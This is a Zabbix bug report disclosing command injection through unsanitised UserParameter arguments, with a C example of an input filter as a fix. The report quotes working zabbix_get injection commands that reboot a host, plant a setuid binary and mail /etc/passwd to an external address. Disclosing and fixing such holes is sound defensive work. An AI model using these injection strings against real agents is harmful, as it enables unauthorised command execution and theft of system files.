ZABBIX BUGS AND ISSUES: ZBX-790

Userparameter parameters aren't sanitised, allowing arbitrary command execution from zabbix_get


    • Incident report
    • Resolution: Fixed
    • Blocker
    • 1.9.0 (alpha)
    • 1.4.5, 1.6.7, 1.9.0 (alpha)
    • Agent (G)
    • None
    • Ubuntu 8.10

      If you create a UserParameter which takes variable parameters, then by running zabbix_get you can use it to execute arbitrary commands as user zabbix on a machine running zabbix_agent; I'm not sure what benefit there might be to running arbitrary commands as user zabbix, but it's a concern nonetheless.

      I'm running the 1.4.6 version of zabbix included with Ubuntu 8.10, so this might have been fixed since, but I downloaded the 1.6.2 source and I don't see any sign of the zabbix_agent code sanitising the parameters passed to a UserParameter command.

      For example, if I add a user parameter I found on a web site for disk monitoring:

      UserParameter=custom.vfs.dev.write[*],grep $1 /proc/diskstats | head -1 | awk '{print $$8}'

      That's innocuous by itself, but any user can run zabbix_get with command lines like these:

      zabbix_get -slocalhost "-kcustom.vfs.dev.write.ops[x|/sbin/reboot]"
      zabbix_get -slocalhost "-kcustom.vfs.dev.write.ops[x|cp /usr/bin/whoami /home/foo/tmp ; chmod a+xs /home/foo/tmp/whoami]"
      zabbix_get -slocalhost "-kcustom.vfs.dev.write.ops[x|mail [email protected] < /etc/passwd]"

      They can execute any program (reboot probably won't let zabbix run it, but some machines might), copy any arbitrary program and make it setuid zabbix, access any restricted file that zabbix might have access to, or mail themselves any file on that machine that zabbix can read.

      I'm not quite sure what the best solution to this would be, but at a minimum zabbix_agent should reject any key strings containing |, ;, >, <, ", $, &, \, spaces, or other special shell characters. Even putting " around the $1 in the UserParameter definition isn't a workaround, because you can pass " characters as part of the key in the zabbix_get call.
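The check the reporter asks for, written out as an added C example (this is not code from the Zabbix agent or from the reporter): a parameter is rejected if it contains any of the reporter's listed shell metacharacters, plus a few more a defender would add, and the `$1` expansion into the UserParameter command only happens after that check passes. The rejected character set and the function names are assumptions for illustration; later agent versions expose a comparable switch as UnsafeUserParameters, but this block is not that code.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Characters rejected in a UserParameter argument. Assumption: the reporter's
 * list (| ; > < " $ & \ and space) extended with the remaining shell
 * metacharacters; this set is not taken from the Zabbix source. */
static const char UNSAFE_CHARS[] = "\\'\"`*?[]{}~$!&;()<>|#@ \n";

/* Return 1 if no byte of param is in UNSAFE_CHARS, 0 otherwise.
 * When offending is non-NULL it receives the first rejected byte
 * (or '\0' when the parameter is clean) so the agent could log it. */
int param_is_safe(const char *param, char *offending)
{
    for (const char *p = param; *p != '\0'; p++) {
        if (strchr(UNSAFE_CHARS, *p) != NULL) {
            if (offending != NULL)
                *offending = *p;
            return 0;
        }
    }
    if (offending != NULL)
        *offending = '\0';
    return 1;
}

/* Build the shell command for a UserParameter: "$1" becomes param and
 * "$$" becomes a literal "$" (as in the awk '{print $$8}' on this page),
 * but only after param has passed param_is_safe().
 * Returns 0 on success, -1 if param was rejected, -2 if out is too small. */
int expand_user_parameter(const char *command, const char *param,
                          char *out, size_t outlen)
{
    char bad;
    if (!param_is_safe(param, &bad))
        return -1;

    size_t n = 0;
    for (const char *c = command; *c != '\0'; c++) {
        const char *piece;
        size_t len;
        char one[2] = {0, 0};

        if (*c == '$' && c[1] == '1') {
            piece = param;
            len = strlen(param);
            c++;                      /* skip the '1' */
        } else if (*c == '$' && c[1] == '$') {
            one[0] = '$';
            piece = one;
            len = 1;
            c++;                      /* skip the second '$' */
        } else {
            one[0] = *c;
            piece = one;
            len = 1;
        }
        if (n + len + 1 > outlen)     /* keep room for the terminator */
            return -2;
        memcpy(out + n, piece, len);
        n += len;
    }
    out[n] = '\0';
    return 0;
}

int main(void)
{
    /* Constructed inputs: the page's UserParameter command, one legitimate
     * argument and one of the injected arguments quoted in the report. */
    const char *cmd = "grep $1 /proc/diskstats | head -1 | awk '{print $$8}'";
    const char *args[] = { "sda", "x|/sbin/reboot" };
    char out[256];

    for (size_t i = 0; i < 2; i++) {
        int rc = expand_user_parameter(cmd, args[i], out, sizeof out);
        if (rc == 0)
            printf("accepted: %s\n", out);
        else
            printf("rejected argument %s (rc=%d)\n", args[i], rc);
    }
    return 0;
}
```

Character filtering is the minimum the report asks for; the stronger design is to never hand the argument to a shell at all (exec the program with an argv array), in which case the filter becomes defence in depth rather than the only barrier.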

            Assignee: sasha Alexander Vladishev
            Reporter: movieman Mark Grant
            Votes: 3
            Watchers: 3